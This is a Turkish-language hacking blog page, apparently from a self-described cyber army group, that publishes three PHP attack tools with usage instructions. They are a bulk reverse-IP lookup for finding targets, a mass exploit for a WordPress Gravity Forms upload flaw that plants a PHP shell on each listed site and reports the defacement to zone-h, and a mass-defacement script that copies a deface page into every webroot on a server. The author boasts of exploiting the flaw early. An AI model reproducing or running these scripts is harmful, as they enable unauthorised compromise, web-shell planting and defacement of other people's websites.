-
16 Temmuz 2015 Perşembe
Mass Reverse ip lookup php and site reverse lookup




Kendim Tarafımdan kodladıgım uzun zamandırda kullandıgım hack tollarımdan biri
kullanımı coklu siteleri sorguluyacaksanız siteleri bir txt ye kaydetip cmd.exe üzerinden php tool.php list.txt seklinde ceker
not:sitelerin veya iplerin baslarına http:// koymayın 7.txt dosyasına kayıt eder..

PHP- Kodu:
<?php
error_reporting
(0);

/*
    
    
    Cod3d By DARKWAR2
    Turkish Cyber Army
    
    
    */
    
print "\n+-------------------------------------------+\n";
    print 
"|          Cod3r By DARKWAR2                     |\n";
    print 
"| İP REVERSE LOOKUP  |\n";
    print 
"| TAYFA:EVLAT-VIRTUAL-MARESS |\n";
    print 
"+-------------------------------------------+\n";
if(!
$argv[1]) die("\nSite listesini arguman 1'de belirt = php $_SERVER[PHP_SELF] sitelist.txt\n");
  
$sites = @file($argv[1]) or die("\nDosya bulunamadi,dosya adini kontrol et\n");
 
  foreach(
$sites as $site)
  {
  
$site trim($site);

print 
$site ." |REVERSE ıP LOOKUP Wait......\n";

    
$ast "/zite/"$drsıpa = ("7.txt"); $host "http://api.hackertarget.com/reverseiplookup/?q=".$site$hack file_get_contents($host);
     
$fp fopen("$drsıpa""a+");
    
fwrite($fp$hack PHP_EOL);

}
?>
Bizim farkımız yaptıgımız icraatler ve misyonumuza olan baglılıgımızdandır.Daha önce yıllardır sanalda calısmıs kadromuzla amac edindigimiz degerli gördügümüz seyler icin mücadele eden bir grubuz.Forumdaki yıldızların , rütbelerin verdigi tatmin edici duygularımızı , egolarımızı aşmış işin aslı ile özü ile ugrasan bir yönetim ve ekibe sahibiz.
DEVAMINI OKU..
Wordpress Plugins File Upload Exploit tool Gravity Forms





merhabalar ınput acıgını yani wordpress eklentisi gravity forms olan

 ilk cıkdıgında sömürmeye başlıyanlardan biriydim daha dogrusu o zamanlar zone-h da sadece 3 kişi sömürüyordu bu ilk 3 kişiden birileride bizdik neyseki aradan gecen günlerde arap kardeşlerimiz exploiti kodladıkları gibi public eddiler SAGOLSUNLAR  bendeki exploit ise sadece post girdileri hariçinde diger tüm kodlar tarafıma aittir görüldügü gibi saten oto zone-h kodlarını koyarak otomatik post ettirmeyi saglıyorduk public edenlerinde bu özellik kimisinde yok denilenecek kadar az
kullanım exploit calışdıgı dizine up.gif adında bi txt veriye hacked yazsanız bile yeterli saten exploit içerisindeki nickleri kendiniz degiştirirsiniz zone-h dan kayıt alınmadıysa kendisi alır
ÖRNEK:http://www.zone-h.org/mirror/id/24360597

PHP- Kodu:
<?php /** Coded by DARKWAR2 **/ $ex=file($argv[1]);
echo 
"\n\t Toplam siteyi ver babana: ".count($ex)."\n\n";
for(
$i=0;$i<count($ex);$i++){ $link[$i]=strtok($ex[$i],"\n"); $zz=trim($link[$i]);
 
$post=array("file" => "@up.gif""field_id"=>"3""form_id"=>"1""gform_unique_id"=>"../../../../""name"=>"up.php5"); $url="$zz/?gf_page=upload";$ch curl_init($url); curl_setopt($chCURLOPT_POSTtrue); curl_setopt($chCURLOPT_POSTFIELDS$post); curl_setopt($chCURLOPT_RETURNTRANSFER1); curl_setopt ($chCURLOPT_FOLLOWLOCATION1); curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($chCURLOPT_CONNECTTIMEOUT10); curl_setopt ($chCURLOPT_COOKIEFILE,getcwd().'/cookie1.txt'); curl_setopt ($chCURLOPT_COOKIEJARgetcwd().'/cookie1.txt'); curl_setopt ($chCURLOPT_SSL_VERIFYPEER0); curl_setopt ($chCURLOPT_SSL_VERIFYHOST0); $res curl_exec($ch); curl_close($ch);

                
$dr2="$zz/wp-content/_input_3_up.php5"$gett=@file_get_contents($dr2);
if(
preg_match('/DARKWAR2/i',$gett)){
    echo 
"\n[+]Exploit Done \n[+]shell : $dr2 \n\n ";
     
$dt fopen('veri.txt''a+'); fwrite($dt"$dr2PHP_EOL); fclose($dt);
    
$ch3 curl_init ("http://www.zone-h.org/"); curl_setopt ($ch3CURLOPT_RETURNTRANSFER1); curl_setopt ($ch3CURLOPT_POST1); curl_setopt ($ch3CURLOPT_POSTFIELDS"defacer=DARKWAR2&domain1=$dr2&hackmode=1&reason=1");
if (
preg_match ("/color=\"red\">OK<\/font><\/li>/i"curl_exec ($ch3)));


           
            } else {
        echo 
"| ".$zz " : No HACK \n\n";
    }
}
?>
Bizim farkımız yaptıgımız icraatler ve misyonumuza olan baglılıgımızdandır.Daha önce yıllardır sanalda calısmıs kadromuzla amac edindigimiz degerli gördügümüz seyler icin mücadele eden bir grubuz.Forumdaki yıldızların , rütbelerin verdigi tatmin edici duygularımızı , egolarımızı aşmış işin aslı ile özü ile ugrasan bir yönetim ve ekibe sahibiz.
DEVAMINI OKU..
Winserver fullmass sub dizin beta test


merhabalar wınserverlar için sub dizinli sunucuları bu php script yardımıyla masslıyabiliyoruz şuan beta aşamasında tamamı bitince bu konu altından güncellenecekdir
kullanım sadece dizindeki klasörlarin alt klasörün adını yazmanız yeterlidir not shell kodlaması bana ait degildir.. biz sadece kodlamasına renk katarak sub dizine cevirdik bizede lazım olan budur .php shell için cünki saglam bir sunucuyu bununla masslayın görürsünüz diger shell etkisiz hale gelir
$metin = '/webroot/';
not:beta



PHP- Kodu:
<?php /*
Script: Mass Deface Script
 
    Turkish Cyber Army
    TAYFA:EVLAT-VIRTUAL-MARESS-TURKHAN
*/ 
echo "<center><textarea rows='10' cols='100'>"$defaceurl $_POST['massdefaceurl']; $dir $_POST['massdefacedir'];
echo 
$dir."\n";
 
$metin '/webroot/';
if (
is_dir($dir)) {
    if (
$dh opendir($dir)) {
        while ((
$file readdir($dh)) !== false) {
                        if(
filetype($dir.$file)=="dir"){
                                
$newfile=$dir.$file.$metin."/r00t.php";
                                echo 
$newfile."\n";
                                if (!
copy($defaceurl$newfile)) {
                                        echo 
"failed to copy $file...\n";
                                }
                        }
        }
        
closedir($dh);
    }
}
echo 
"</textarea></center>"?>   Cod3r By DARKWAR2<BR>
    Turkish Cyber Army<BR>
    TAYFA:EVLAT-VIRTUAL-MARESS-TURKHAN <BR>
<td align=right>Mass Defacement:</td><br>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></form></td>



<br><br><br>
** Main Directory = The Directory you want to mass deface (Must have read/write permission) **<br>
** Defacement Url = URL of your deface page (e.g: http://yoursite.com/deface.html ) **<br><br>
</body></html>
Bizim farkımız yaptıgımız icraatler ve misyonumuza olan baglılıgımızdandır.Daha önce yıllardır sanalda calısmıs kadromuzla amac edindigimiz degerli gördügümüz seyler icin mücadele eden bir grubuz.Forumdaki yıldızların , rütbelerin verdigi tatmin edici duygularımızı , egolarımızı aşmış işin aslı ile özü ile ugrasan bir yönetim ve ekibe sahibiz.
DEVAMINI OKU..